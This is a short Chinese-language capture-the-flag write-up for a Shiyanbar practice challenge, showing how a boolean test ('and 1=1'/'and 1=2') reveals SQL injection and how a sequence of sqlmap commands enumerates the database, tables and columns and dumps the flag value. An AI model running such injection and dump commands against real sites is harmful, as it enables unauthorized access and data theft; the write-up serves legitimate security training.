名字叫做看起來比較簡單的一道(sqlmap)
05-28
名字叫做看起來比較簡單的一道(sqlmap)
推薦閱讀:
來自專欄 不會開車的廚師不是好黑客
題目地址:www.shiyanbar.com/ctf/33
題目鏈接:http://ctf5.shiyanbar.com/8/index.php?id=1
點開題目的鏈接得到以下界面:
因為url中有?id=1的字樣,我們此時一下是否存在注入。(用 and 1=1 ,and1=2)
由於返回的結果不同,所以存在注入漏洞。
打開sqlmap,使用語句sqlmap –u http://www.shiyanbar.com/8/index?id=1 –current-db
可以看到我們找打資料庫,並且他的名字為my_db.
使用 sqlmap –u http://www.shiyanbar.com/8/index?id=1 –D my_db –table來獲取my_db資料庫中的表。
通過下圖可以看到發現my_db資料庫中的news thiskey 這兩個表。
使用sqlmap –u http://www.shiyanbar.com/8/index?id=1 D my_db –T thiskey –columns來獲取表thiskey中的列名。
可以看到K0y這個列
使用sqlmap –u http://www.shiyanbar.com/8/index?id=1 –D my_db –T thiskey –C k0y –dump來獲取其中的值。
得到k0y中的值。
提交其中的值,回答正確。
推薦閱讀:
※「安全」對於醫療雲有多重要?
※5月第2周業務風控關注 | 央行:嚴禁未經授權認可的APP接入徵信系統
※IT防火牆設置
※美國國家網路空間安全態勢感知協調機制
※三個有趣的脫殼例子